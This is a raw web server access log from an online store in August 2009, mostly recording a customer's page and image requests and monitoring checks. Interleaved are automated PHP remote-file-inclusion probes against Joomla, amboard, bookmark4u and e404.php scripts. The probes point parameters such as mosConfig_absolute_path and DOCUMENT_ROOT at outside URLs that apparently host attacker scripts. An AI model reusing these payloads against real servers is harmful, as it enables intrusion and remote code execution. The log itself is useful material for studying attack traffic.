220.247.11.218 - - [05/Aug/2009:05:23:06 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0044793" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:07 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0044793" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:08 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0044793" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:08 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0044793" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:08 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0044793" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:08 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0044793" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:09 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0044793" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:09 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0044793" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:09 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0044793" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:09 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0044793" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
89.108.88.84 - - [05/Aug/2009:05:23:10 -0400] "GET /logs/access_log.Q109071700//bbs/ams/amboard/index.php?=http://www.invenire.fi/error_log?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
89.108.88.84 - - [05/Aug/2009:05:23:10 -0400] "GET //bbs/ams/amboard/index.php?=http://www.invenire.fi/error_log?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
220.247.11.218 - - [05/Aug/2009:05:23:10 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0044793" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
89.108.88.84 - - [05/Aug/2009:05:23:10 -0400] "GET /logs//bbs/ams/amboard/index.php?=http://www.invenire.fi/error_log?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
220.247.11.218 - - [05/Aug/2009:05:23:10 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0044793" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
209.59.12.99 - - [05/Aug/2009:05:23:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.247.11.218 - - [05/Aug/2009:05:23:12 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0195CF434EB536007833071+M37+ENG HTTP/1.1" 200 37476 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0044793" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:14 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF434EB536007833071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:20 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF434EB536007833071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
91.142.209.134 - - [05/Aug/2009:05:23:22 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/pebri.p38r1/fx29id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:05:23:22 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/pebri.p38r1/fx29id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:05:23:22 -0400] "GET /logs/access_log.Q109061200//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/pebri.p38r1/fx29id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
220.247.11.218 - - [05/Aug/2009:05:23:20 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0195CF4D4345B6007B73071+M37+ENG HTTP/1.1" 200 76831 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF434EB536007833071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:28 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF4D4345B6007B73071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:28 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF4D4345B6007B73071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:28 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF4D4345B6007B73071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:30 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG HTTP/1.1" 200 57474 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:31 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:32 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:32 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:32 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:32 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:32 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:33 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:33 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:33 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:33 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:33 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:34 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:34 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:34 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:34 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:34 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:35 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:35 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:35 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:35 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:36 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:36 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:36 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:23:36 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
91.142.209.134 - - [05/Aug/2009:05:23:46 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.geocities.com/pebri.p38r1/fx29id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:05:23:46 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.geocities.com/pebri.p38r1/fx29id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:05:23:57 -0400] "GET /logs/access_log.Q109050800/e404.php?DOCUMENT_ROOT=http://www.geocities.com/pebri.p38r1/fx29id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
110.45.138.141 - - [05/Aug/2009:05:24:06 -0400] "GET /logs/access_log.Q109071600//?_SERVER[DOCUMENT_ROOT]=http://plengeh.wen.ru/mic22.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
110.45.138.141 - - [05/Aug/2009:05:24:06 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://plengeh.wen.ru/mic22.txt? HTTP/1.1" 200 12411 "-" "libwww-perl/5.79"
91.142.209.134 - - [05/Aug/2009:05:24:09 -0400] "GET /logs/access_log.Q109071200/e404.php?DOCUMENT_ROOT=http://www.geocities.com/pebri.p38r1/fx29id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
94.75.245.36 - - [05/Aug/2009:05:24:26 -0400] "GET /logs/access_log.Q109071700//bbs/ams/amboard/index.php?=http://www.wsweld.co.kr/ams/amboard/compile/default/blank.gif?? HTTP/1.1" 404 251 "-" "libwww-perl/5.823"
94.75.245.36 - - [05/Aug/2009:05:24:26 -0400] "GET //bbs/ams/amboard/index.php?=http://www.wsweld.co.kr/ams/amboard/compile/default/blank.gif?? HTTP/1.1" 404 224 "-" "libwww-perl/5.823"
94.75.245.36 - - [05/Aug/2009:05:24:26 -0400] "GET /logs//bbs/ams/amboard/index.php?=http://www.wsweld.co.kr/ams/amboard/compile/default/blank.gif?? HTTP/1.1" 404 229 "-" "libwww-perl/5.823"
110.45.138.141 - - [05/Aug/2009:05:24:46 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://plengeh.wen.ru/mic22.txt? HTTP/1.1" 200 452 "-" "libwww-perl/5.79"
91.142.209.134 - - [05/Aug/2009:05:25:02 -0400] "GET /logs/access_log.Q109061200//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/pebri.p38r1/fx29id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:05:25:02 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/pebri.p38r1/fx29id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:05:25:02 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/pebri.p38r1/fx29id1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
207.58.179.136 - - [05/Aug/2009:05:25:09 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.825"
207.58.179.136 - - [05/Aug/2009:05:25:09 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.825"
207.58.179.136 - - [05/Aug/2009:05:25:09 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.825"
207.58.179.136 - - [05/Aug/2009:05:25:43 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
207.58.179.136 - - [05/Aug/2009:05:25:43 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
110.45.138.141 - - [05/Aug/2009:05:25:49 -0400] "GET /logs/access_log.Q109071700//?_SERVER[DOCUMENT_ROOT]=http://plengeh.wen.ru/mic22.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.79"
207.58.179.136 - - [05/Aug/2009:05:26:24 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.825"
117.110.74.195 - - [05/Aug/2009:05:26:28 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
117.110.74.195 - - [05/Aug/2009:05:26:28 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
117.110.74.195 - - [05/Aug/2009:05:26:29 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
220.247.11.218 - - [05/Aug/2009:05:27:07 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0195CF4F469556008403071+M37+ENG HTTP/1.1" 200 56891 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF494EE546008AD3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
91.142.209.134 - - [05/Aug/2009:05:27:22 -0400] "GET /logs/access_log.Q109061200%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/pebri.p38r1/fx29id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
91.142.209.134 - - [05/Aug/2009:05:27:25 -0400] "GET /logs/access_log.Q109061200%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.geocities.com/pebri.p38r1/fx29id1.txt? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
117.110.74.195 - - [05/Aug/2009:05:27:40 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 235 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
117.110.74.195 - - [05/Aug/2009:05:27:41 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 208 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
220.247.11.218 - - [05/Aug/2009:05:27:43 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0195D04E4075A6005AE3071+M37+ENG HTTP/1.1" 200 56836 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195CF4F469556008403071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
117.110.74.195 - - [05/Aug/2009:05:27:50 -0400] "GET /logs/access_log.Q109051400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/readme.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
220.247.11.218 - - [05/Aug/2009:05:27:51 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0195D0414F15D6008823071+M37+ENG HTTP/1.1" 200 56810 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195D04E4075A6005AE3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:27:56 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0195D0474F8556008373071+M37+ENG HTTP/1.1" 200 58136 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195D0414F15D6008823071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
220.247.11.218 - - [05/Aug/2009:05:28:02 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0195D04D4075B60082F3071+M37+ENG HTTP/1.1" 200 57061 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195D0474F8556008373071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
209.59.12.99 - - [05/Aug/2009:05:28:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.247.11.218 - - [05/Aug/2009:05:28:09 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0195D04346D586009C53071+M37+ENG HTTP/1.1" 200 71336 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0195D04D4075B60082F3071+M37+ENG" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
